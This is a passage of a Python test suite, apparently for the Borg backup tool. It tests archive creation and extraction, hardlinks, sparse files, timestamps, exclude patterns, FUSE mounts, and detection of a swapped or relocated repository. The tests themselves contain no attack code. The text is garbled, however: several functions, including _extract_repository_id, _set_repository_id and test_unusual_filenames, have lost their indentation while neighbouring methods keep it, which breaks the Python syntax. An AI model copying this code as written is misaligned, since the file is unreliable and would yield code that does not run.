            # we could not create these device files without (fake)root
            expected.remove('input/bdev')
            expected.remove('input/cdev')
        if has_lchflags:
            # remove the file we did not backup, so input and output become equal
            expected.remove('input/flagfile')  # this file is UF_NODUMP
            os.remove(os.path.join('input', 'flagfile'))
        list_output = self.cmd('list', '--short', self.repository_location + '::test')
        for name in expected:
            self.assert_in(name, list_output)
        self.assert_dirs_equal('input', 'output/input')
        info_output = self.cmd('info', self.repository_location + '::test')
        item_count = 4 if has_lchflags else 5  # one file is UF_NODUMP
        self.assert_in('Number of files: %d' % item_count, info_output)
        # the repo cache gets rebuilt from the repository after removal,
        # which must not change the reported info
        shutil.rmtree(self.cache_path)
        info_output2 = self.cmd('info', self.repository_location + '::test')

        def filter(output):
            # filter for interesting "info" output, ignore cache rebuilding related stuff
            prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
                        'All archives:', 'Chunk index:', ]
            result = []
            for line in output.splitlines():
                for prefix in prefixes:
                    if line.startswith(prefix):
                        result.append(line)
            return '\n'.join(result)

        # the interesting parts of info_output2 and info_output should be same
        self.assert_equal(filter(info_output), filter(info_output2))
    @requires_hardlinks
    def test_create_duplicate_root(self):
        """Giving the same root twice must not duplicate items (regression #5603)."""
        # setup for #5603
        path_a = os.path.join(self.input_path, 'a')
        path_b = os.path.join(self.input_path, 'b')
        os.mkdir(path_a)
        os.mkdir(path_b)
        hl_a = os.path.join(path_a, 'hardlink')
        hl_b = os.path.join(path_b, 'hardlink')
        self.create_regular_file(hl_a, contents=b'123456')
        os.link(hl_a, hl_b)
        self.cmd('init', '--encryption=none', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input', 'input')  # give input twice!
        # test if created archive has 'input' contents twice:
        archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
        paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
        # we have all fs items exactly once!
        assert sorted(paths) == ['input', 'input/a', 'input/a/hardlink', 'input/b', 'input/b/hardlink']
    def test_init_parent_dirs(self):
        """init only creates missing parent dirs when --make-parent-dirs is given."""
        parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
        repository_path = os.path.join(parent_path, 'repository')
        repository_location = self.prefix + repository_path
        with pytest.raises(Repository.ParentPathDoesNotExist):
            # normal borg init does NOT create missing parent dirs
            self.cmd('init', '--encryption=none', repository_location)
        # but if told so, it does:
        self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
        assert os.path.exists(parent_path)
    def test_unix_socket(self):
        """Unix sockets in the input are silently skipped by create/extract."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        try:
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.bind(os.path.join(self.input_path, 'unix-socket'))
        except PermissionError as err:
            # NOTE(review): if errno is neither EPERM nor EACCES this falls
            # through with the bind failed -- presumably unreachable; confirm.
            if err.errno == errno.EPERM:
                pytest.skip('unix sockets disabled or not supported')
            elif err.errno == errno.EACCES:
                pytest.skip('permission denied to create unix sockets')
        self.cmd('create', self.repository_location + '::test', 'input')
        sock.close()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert not os.path.exists('input/unix-socket')
    @pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
    def test_symlink_extract(self):
        """Symlink targets survive a create/extract round trip unchanged."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert os.readlink('input/link1') == 'somewhere'
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    def test_atime(self):
        """--atime stores and restores atime; without O_NOATIME the input's
        atime is expected to change during backup."""
        def has_noatime(some_file):
            # Detect whether opening with the noatime flag really leaves
            # atime untouched on this platform/filesystem.
            atime_before = os.stat(some_file).st_atime_ns
            try:
                with open(os.open(some_file, flags_noatime)) as file:
                    file.read()
            except PermissionError:
                return False
            else:
                atime_after = os.stat(some_file).st_atime_ns
                noatime_used = flags_noatime != flags_normal
                return noatime_used and atime_before == atime_after

        self.create_test_files()
        atime, mtime = 123456780, 234567890
        have_noatime = has_noatime('input/file1')
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--atime', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
        if have_noatime:
            assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
        else:
            # it touched the input file's atime while backing it up
            assert sto.st_atime_ns == atime * 1e9
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    @pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
    def test_birthtime(self):
        """Birthtime is stored and restored by default."""
        self.create_test_files()
        birthtime, mtime, atime = 946598400, 946684800, 946771200
        # first utime sets mtime (and thus birthtime, which only moves
        # backwards), the second sets the final mtime
        os.utime('input/file1', (atime, birthtime))
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
    @pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
    @pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
    def test_nobirthtime(self):
        """With --nobirthtime the extracted file's birthtime is NOT restored
        (it ends up equal to the restored mtime instead)."""
        self.create_test_files()
        birthtime, mtime, atime = 946598400, 946684800, 946771200
        os.utime('input/file1', (atime, birthtime))
        os.utime('input/file1', (atime, mtime))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        sti = os.stat('input/file1')
        sto = os.stat('output/input/file1')
        assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
        assert int(sto.st_birthtime * 1e9) == mtime * 1e9
        assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
    def test_sparse_file(self):
        """If the OS/FS supports sparse files, extract --sparse must restore
        holes as holes (content and sparseness both verified)."""
        def is_sparse(fn, total_size, hole_size):
            # Heuristic sparseness check: block count smaller than the file
            # size, plus (if available) SEEK_HOLE/SEEK_DATA probing of the
            # first hole.
            st = os.stat(fn)
            assert st.st_size == total_size
            sparse = True
            if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
                sparse = False
            if sparse and has_seek_hole:
                with open(fn, 'rb') as fd:
                    # only check if the first hole is as expected, because the 2nd hole check
                    # is problematic on xfs due to its "dynamic speculative EOF preallocation
                    try:
                        if fd.seek(0, os.SEEK_HOLE) != 0:
                            sparse = False
                        if fd.seek(0, os.SEEK_DATA) != hole_size:
                            sparse = False
                    except OSError:
                        # OS/FS does not really support SEEK_HOLE/SEEK_DATA
                        sparse = False
            return sparse

        filename = os.path.join(self.input_path, 'sparse')
        content = b'foobar'
        hole_size = 5 * (1 << CHUNK_MAX_EXP)  # 5 full chunker buffers
        total_size = hole_size + len(content) + hole_size
        with open(filename, 'wb') as fd:
            # create a file that has a hole at the beginning and end (if the
            # OS and filesystem supports sparse files)
            fd.seek(hole_size, 1)
            fd.write(content)
            fd.seek(hole_size, 1)
            pos = fd.tell()
            fd.truncate(pos)
        # we first check if we could create a sparse input file:
        sparse_support = is_sparse(filename, total_size, hole_size)
        if sparse_support:
            # we could create a sparse input file, so creating a backup of it and
            # extracting it again (as sparse) should also work:
            self.cmd('init', '--encryption=repokey', self.repository_location)
            self.cmd('create', self.repository_location + '::test', 'input')
            with changedir(self.output_path):
                self.cmd('extract', '--sparse', self.repository_location + '::test')
            self.assert_dirs_equal('input', 'output/input')
            filename = os.path.join(self.output_path, 'input', 'sparse')
            with open(filename, 'rb') as fd:
                # check if file contents are as expected
                self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
                self.assert_equal(fd.read(len(content)), content)
                self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
            self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
    def test_repository_swap_detection(self):
        """A swapped-in repo that reuses the old repository id but different encryption must be rejected."""
        self.create_test_files()
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = self._extract_repository_id(self.repository_path)
        self.cmd('create', self.repository_location + '::test', 'input')
        # replace the repo with an unencrypted one carrying the same id
        shutil.rmtree(self.repository_path)
        self.cmd('init', '--encryption=none', self.repository_location)
        self._set_repository_id(self.repository_path, repository_id)
        self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
        # the cache remembers repokey encryption for this id -> create must fail
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.EncryptionMethodMismatch):
                self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_swap_detection2(self):
        """Renaming an unencrypted repo over an encrypted one (different ids) must abort access."""
        self.create_test_files()
        self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
        self.cmd('create', self.repository_location + '_encrypted::test', 'input')
        # swap: the unencrypted repo now sits at the encrypted repo's path
        shutil.rmtree(self.repository_path + '_encrypted')
        os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.RepositoryAccessAborted):
                self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
    def test_repository_swap_detection_no_cache(self):
        """Like test_repository_swap_detection, but with the local cache deleted first.

        Detection must still trigger (presumably via the security dir — confirm).
        """
        self.create_test_files()
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = self._extract_repository_id(self.repository_path)
        self.cmd('create', self.repository_location + '::test', 'input')
        # replace the repo with an unencrypted one carrying the same id
        shutil.rmtree(self.repository_path)
        self.cmd('init', '--encryption=none', self.repository_location)
        self._set_repository_id(self.repository_path, repository_id)
        self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
        self.cmd('delete', '--cache-only', self.repository_location)
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.EncryptionMethodMismatch):
                self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_swap_detection2_no_cache(self):
        """Like test_repository_swap_detection2, but with both local caches deleted first."""
        self.create_test_files()
        self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
        os.environ['BORG_PASSPHRASE'] = 'passphrase'
        self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
        self.cmd('create', self.repository_location + '_encrypted::test', 'input')
        self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
        self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
        # swap: the unencrypted repo now sits at the encrypted repo's path
        shutil.rmtree(self.repository_path + '_encrypted')
        os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
        if self.FORK_DEFAULT:
            self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.RepositoryAccessAborted):
                self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
    def test_repository_swap_detection_repokey_blank_passphrase(self):
        # Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
        self.create_test_files()
        # User initializes her repository with her passphrase
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        # Attacker replaces it with her own repository, which is encrypted but has no passphrase set
        shutil.rmtree(self.repository_path)
        with environment_variable(BORG_PASSPHRASE=''):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # Delete cache & security database, AKA switch to user perspective
        self.cmd('delete', '--cache-only', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        shutil.rmtree(get_security_dir(repository_id))
        with environment_variable(BORG_PASSPHRASE=None):
            # This is the part where the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
            # is set, while it isn't. Previously this raised no warning,
            # since the repository is, technically, encrypted.
            if self.FORK_DEFAULT:
                self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
            else:
                with pytest.raises(Cache.CacheInitAbortedError):
                    self.cmd('create', self.repository_location + '::test.2', 'input')
    def test_repository_move(self):
        """Relocating a repo needs one confirmation; afterwards the security dir tracks the new location."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        os.rename(self.repository_path, self.repository_path + '_new')
        # first access after the move requires explicit confirmation
        with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
            self.cmd('info', self.repository_location + '_new')
        security_dir = get_security_dir(repository_id)
        with open(os.path.join(security_dir, 'location')) as fd:
            location = fd.read()
        assert location == Location(self.repository_location + '_new').canonical_path()
        # Needs no confirmation anymore
        self.cmd('info', self.repository_location + '_new')
        shutil.rmtree(self.cache_path)
        self.cmd('info', self.repository_location + '_new')
        shutil.rmtree(security_dir)
        self.cmd('info', self.repository_location + '_new')
        # the info call above re-populated the security dir files
        for file in ('location', 'key-type', 'manifest-timestamp'):
            assert os.path.exists(os.path.join(security_dir, file))
    def test_security_dir_compat(self):
        """An outdated 'location' entry in the security dir is tolerated while the cache is intact."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        security_dir = get_security_dir(repository_id)
        with open(os.path.join(security_dir, 'location'), 'w') as fd:
            fd.write('something outdated')
        # This is fine, because the cache still has the correct information. security_dir and cache can disagree
        # if older versions are used to confirm a renamed repository.
        self.cmd('info', self.repository_location)
    def test_unknown_unencrypted(self):
        """Accessing an unencrypted repo unknown to both cache and security dir needs confirmation."""
        self.cmd('init', '--encryption=none', self.repository_location)
        repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
        security_dir = get_security_dir(repository_id)
        # Ok: repository is known
        self.cmd('info', self.repository_location)
        # Ok: repository is still known (through security_dir)
        shutil.rmtree(self.cache_path)
        self.cmd('info', self.repository_location)
        # Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
        shutil.rmtree(self.cache_path)  # cache was re-created by the 'info' call above
        shutil.rmtree(security_dir)
        if self.FORK_DEFAULT:
            self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
        else:
            with pytest.raises(Cache.CacheInitAbortedError):
                self.cmd('info', self.repository_location)
        with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
            self.cmd('info', self.repository_location)
    def test_strip_components(self):
        """--strip-components removes the given number of leading path components on extract."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir/file')
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            # stripping 3 components consumes the full path 'input/dir/file' -> nothing extracted
            self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
            self.assert_true(not os.path.exists('file'))
            with self.assert_creates_file('file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
            with self.assert_creates_file('dir/file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
            with self.assert_creates_file('input/dir/file'):
                self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
    def _extract_hardlinks_setup(self):
        """Create an archive containing two hardlink groups.

        'source' has 4 links (source, abba, dir1/hardlink, dir1/subdir/hardlink);
        'dir1/source2' has 2 links (source2, dir1/aaaa).
        """
        os.mkdir(os.path.join(self.input_path, 'dir1'))
        os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
        self.create_regular_file('source', contents=b'123456')
        os.link(os.path.join(self.input_path, 'source'),
                os.path.join(self.input_path, 'abba'))
        os.link(os.path.join(self.input_path, 'source'),
                os.path.join(self.input_path, 'dir1/hardlink'))
        os.link(os.path.join(self.input_path, 'source'),
                os.path.join(self.input_path, 'dir1/subdir/hardlink'))
        self.create_regular_file('dir1/source2')
        os.link(os.path.join(self.input_path, 'dir1/source2'),
                os.path.join(self.input_path, 'dir1/aaaa'))
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
    @requires_hardlinks
    @unittest.skipUnless(llfuse, 'llfuse not installed')
    def test_fuse_mount_hardlinks(self):
        """Hardlink counts and contents are preserved in FUSE mounts, also with strip/subset options."""
        self._extract_hardlinks_setup()
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        # we need to get rid of permissions checking because fakeroot causes issues with it.
        # On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
        # On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
        if sys.platform == 'darwin':
            ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
        else:
            ignore_perms = ['-o', 'ignore_permissions']
        # mount with 2 components stripped: only the subtree below input/dir1 is visible
        with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('hardlink').st_nlink == 2
            assert os.stat('subdir/hardlink').st_nlink == 2
            assert open('subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('aaaa').st_nlink == 2
            assert os.stat('source2').st_nlink == 2
        # mount only a subset of paths: link counts reflect what is inside the mount
        with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('input/dir1/hardlink').st_nlink == 2
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('input/dir1/aaaa').st_nlink == 2
            assert os.stat('input/dir1/source2').st_nlink == 2
        # full mount: the 4-link group is fully visible
        with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
                changedir(mountpoint):
            assert os.stat('input/source').st_nlink == 4
            assert os.stat('input/abba').st_nlink == 4
            assert os.stat('input/dir1/hardlink').st_nlink == 4
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
    @requires_hardlinks
    def test_extract_hardlinks1(self):
        """Plain extract restores all hardlinks with their full link counts."""
        self._extract_hardlinks_setup()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            assert os.stat('input/source').st_nlink == 4
            assert os.stat('input/abba').st_nlink == 4
            assert os.stat('input/dir1/hardlink').st_nlink == 4
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
    @requires_hardlinks
    def test_extract_hardlinks2(self):
        """Partial extracts (--strip-components / subset paths) still restore the contained hardlinks."""
        self._extract_hardlinks_setup()
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
            assert os.stat('hardlink').st_nlink == 2
            assert os.stat('subdir/hardlink').st_nlink == 2
            assert open('subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('aaaa').st_nlink == 2
            assert os.stat('source2').st_nlink == 2
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', 'input/dir1')
            assert os.stat('input/dir1/hardlink').st_nlink == 2
            assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
            assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
            assert os.stat('input/dir1/aaaa').st_nlink == 2
            assert os.stat('input/dir1/source2').st_nlink == 2
    @requires_hardlinks
    def test_extract_hardlinks_twice(self):
        """Extracting an archive that contains the same hardlinked paths twice must work (#5603)."""
        # setup for #5603
        path_a = os.path.join(self.input_path, 'a')
        path_b = os.path.join(self.input_path, 'b')
        os.mkdir(path_a)
        os.mkdir(path_b)
        hl_a = os.path.join(path_a, 'hardlink')
        hl_b = os.path.join(path_b, 'hardlink')
        self.create_regular_file(hl_a, contents=b'123456')
        os.link(hl_a, hl_b)
        self.cmd('init', '--encryption=none', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input', 'input')  # give input twice!
        # now test extraction
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
            # if issue #5603 happens, extraction gives rc == 1 (triggering AssertionError) and warnings like:
            # input/a/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/a/hardlink'
            # input/b/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/b/hardlink'
            # otherwise, when fixed, the hardlinks should be there and have a link count of 2
            assert os.stat('input/a/hardlink').st_nlink == 2
            assert os.stat('input/b/hardlink').st_nlink == 2
    def test_extract_include_exclude(self):
        """Include (positional path) and exclude (--exclude / --exclude-from) options on extract."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('file3', size=1024 * 80)
        self.create_regular_file('file4', size=1024 * 80)
        # file4 is excluded already at create time and so never in the archive
        self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', 'input/file1', )
        self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
        with changedir('output'):
            self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
        with changedir('output'):
            self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
    def test_extract_include_exclude_regex(self):
        """Regular-expression ('re:') exclusions on create and extract, alone and mixed with fnmatch."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('file2', size=1024 * 80)
        self.create_regular_file('file3', size=1024 * 80)
        self.create_regular_file('file4', size=1024 * 80)
        self.create_regular_file('file333', size=1024 * 80)
        # Create with regular expression exclusion for file4
        self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
        shutil.rmtree('output/input')
        # Extract with regular expression exclusion
        with changedir('output'):
            self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
        shutil.rmtree('output/input')
        # Combine --exclude with fnmatch and regular expression
        with changedir('output'):
            self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
        shutil.rmtree('output/input')
        # Combine --exclude-from and regular expression exclusion
        with changedir('output'):
            self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
                     '--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
        self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
    def test_extract_with_pattern(self):
        """Positional extract patterns ('re:', 'fm:', plain paths), alone and combined with --exclude."""
        self.cmd("init", '--encryption=repokey', self.repository_location)
        self.create_regular_file("file1", size=1024 * 80)
        self.create_regular_file("file2", size=1024 * 80)
        self.create_regular_file("file3", size=1024 * 80)
        self.create_regular_file("file4", size=1024 * 80)
        self.create_regular_file("file333", size=1024 * 80)
        self.cmd("create", self.repository_location + "::test", "input")
        # Extract everything with regular expression
        with changedir("output"):
            self.cmd("extract", self.repository_location + "::test", "re:.*")
        self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
        shutil.rmtree("output/input")
        # Extract with pattern while also excluding files
        with changedir("output"):
            self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
        self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
        shutil.rmtree("output/input")
        # Combine --exclude with pattern for extraction
        with changedir("output"):
            self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
        self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
        shutil.rmtree("output/input")
        # Multiple pattern
        with changedir("output"):
            self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
        self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
    def test_extract_progress(self):
        """extract --progress emits 'Extracting:' progress output."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file', size=1024 * 80)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir('output'):
            output = self.cmd('extract', self.repository_location + '::test', '--progress')
            assert 'Extracting:' in output
    def _create_test_caches(self):
        """Prepare input with a valid CACHEDIR.TAG (cache1), an invalid one (cache2) and a
        hardlinked/duplicated valid one (cache3)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
                                 contents=CACHE_TAG_CONTENTS + b' extra stuff')
        # wrong signature -> must NOT be treated as a cache dir
        self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
                                 contents=b'invalid signature')
        os.mkdir('input/cache3')
        if are_hardlinks_supported():
            os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
        else:
            self.create_regular_file('cache3/%s' % CACHE_TAG_NAME,
                                     contents=CACHE_TAG_CONTENTS + b' extra stuff')
    def test_create_stdin(self):
        """Archiving from stdin ('-') stores the data under path 'stdin' with uid/gid 0."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        input_data = b'\x00foo\n\nbar\n   \n'
        self.cmd('create', self.repository_location + '::test', '-', input=input_data)
        item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
        assert item['uid'] == 0
        assert item['gid'] == 0
        assert item['size'] == len(input_data)
        assert item['path'] == 'stdin'
        extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
        assert extracted_data == input_data
    def test_create_content_from_command(self):
        """--content-from-command archives a command's stdout under the --stdin-name path."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        input_data = 'some test content'
